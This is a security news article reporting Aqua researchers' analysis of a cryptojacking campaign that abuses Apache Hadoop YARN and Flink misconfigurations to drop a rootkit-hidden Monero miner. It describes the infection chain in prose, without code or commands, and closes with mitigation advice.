Cybersecurity researchers have discovered a new attack that exploits misconfigurations in Apache Hadoop and Flink to spread cryptocurrency miners within targeted environments.
“This attack is particularly interesting due to the attacker’s use of packages and rootkits to hide the malware,” Aqua security researchers Nitzan Yaakov and Assaf Morag said in an analysis published earlier this week. “The malware deletes the contents of specific directories and modifies system configurations to avoid detection.”
The infection chain targeting Hadoop takes advantage of a misconfiguration in YARN’s ResourceManager (another resource negotiator), which is responsible for tracking resources in the cluster and scheduling applications.
Specifically, the misconfiguration can be exploited by an unauthenticated remote threat actor to execute arbitrary code via a crafted HTTP request, subject to user privileges on the node where the code is executed.
Likewise, attacks targeting Apache Flink target misconfiguration that allows a remote attacker to execute code without any authentication.
These misconfigurations are not new and have been exploited in the past by financially motivated groups like TeamTNT, which is known for its history of targeting Docker and Kubernetes environments for the purpose of cryptojacking and other malicious activity.
But what makes the latest set of attacks noteworthy is the use of rootkits to hide cryptocurrency mining operations after gaining an initial foothold in Hadoop and Flink applications.
“The attacker sends an unauthenticated request to deploy a new application,” the researchers explained. “The attacker is able to run remote code by sending a POST request to YARN, requesting that the new application be run at the attacker’s command.”
The command is specifically designed to clear the /tmp directory of all existing content, fetch a file called “dca” from a remote server, and execute it, followed by deleting all files in the /tmp directory again.
The implemented payload is a packed ELF binary file that serves as a downloader to recover two rootkit programs and a Monero cryptocurrency mining binary. It should be noted that many adversaries, including Kinsing, have resorted to using rootkits to hide the existence of the mining operation.
To achieve persistence, a cron job is created to download and execute a shell script that deploys the “dca” binary. Further analysis of the threat actor’s infrastructure reveals that the staging server used to fetch the downloader was registered on October 31, 2023.
To mitigate risks, it is recommended that organizations deploy agent-based security solutions to detect mining bots, rootkits, obfuscated or compiled binaries, as well as other suspicious runtime behavior.